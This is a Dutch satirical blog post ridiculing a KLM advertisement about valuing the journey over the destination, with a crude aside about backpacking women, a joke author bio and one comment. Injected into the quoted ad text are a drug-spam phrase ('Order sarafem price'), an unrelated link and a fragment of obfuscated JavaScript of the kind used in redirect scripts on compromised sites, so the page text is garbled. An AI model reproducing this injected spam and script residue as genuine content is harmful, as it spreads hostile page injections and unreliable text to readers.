Een stukje KLM-kul

Gelukkig vindt Marco de Bestemming nog wel belangrijk.

Gelukkig vindt Marco de Bestemming nog wel belangrijk.

Een reclame van de KLM deed me denken aan iemand die ooit de dooddoener ‘Het gaat niet om de bestemming, maar om de reis er naar toe‘ als msn-tekst had ingesteld. Het was zo iemand die ook prima ‘Het leven is een feest, en jij bent uitgenodigd’ had kunnen kiezen. Of een spreuk van Toon Hermans.

Het is uiteraard onzin. Het gaat helemaal niet om de reis. Dat deed het natuurlijk sowieso al niet, want zo leuk was het heus niet in de Uiver. En laat staan in de – toch degelijk verwarmde – Hindenburg.

Het gaat wel degelijk om de bestemming. Het gaat er om dat je zodra je geland bent zo’n hip kaartje op je Hyves kunt zetten met alle landen waar je geweest bent. Het liefst met de toevoeging dat je het bij voorkeur ‘vaak en ver’ gaat.

Sinds het bon ton is dat vrouwen rond hun 23ste naar Zuid-Amerika trekken om daar Spaans te leren en met een spiegel gehurkt hun vagijn te verkennen, heeft de inflatie toegeslagen. Machu Picchu is het nieuwe Atomium geworden. De bewering dat de kinderen ‘daar’ niks hebben, maar altijd lachen is inmiddels inhoudsloos.

Maar goed, wat ik eigenlijk wilde laten zien is dat sommige reclamemakers een hoop kul uitstorten die meestal het ene oor in en het andere uitgaat. Sta daar eens bij stil als u weer eens een tekst als de volgende voorbij hoort komen.

Order sarafem price Toen mensen voor het eerst gingen reizen, vonden ze de reis net zo bijzonder als de plek waar ze naar toe gingen.

Maar door de jaren heen is het leven steeds gejaagder geworden.

De bestemming bereiken werd belangrijker dan de manier waarop.

Gelukkig zijn er nog steeds mensen die vinden, dat de reis minstens zo inspirerend moet zijn als de bestemming. http://youth-4-elbe.org/?p=2479

En juist die mensen vind je op elke KLM vlucht. ator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Bekendheid kreeg hij met de presentatie van de AVRO's Wie-kent-kwis met de zogenaamde marmotten-race, waarbij het echter om cavia's ging. Hij werd verkozen tijdens het Conclaaf van april 2005 en is auteur van onder meer het boek: "Standing Firm: A Vice-Presidential Memoir".

Een reactie op “Een stukje KLM-kul”

  1. Eens. Wat een boute kut-commercial.

Laat een bericht achter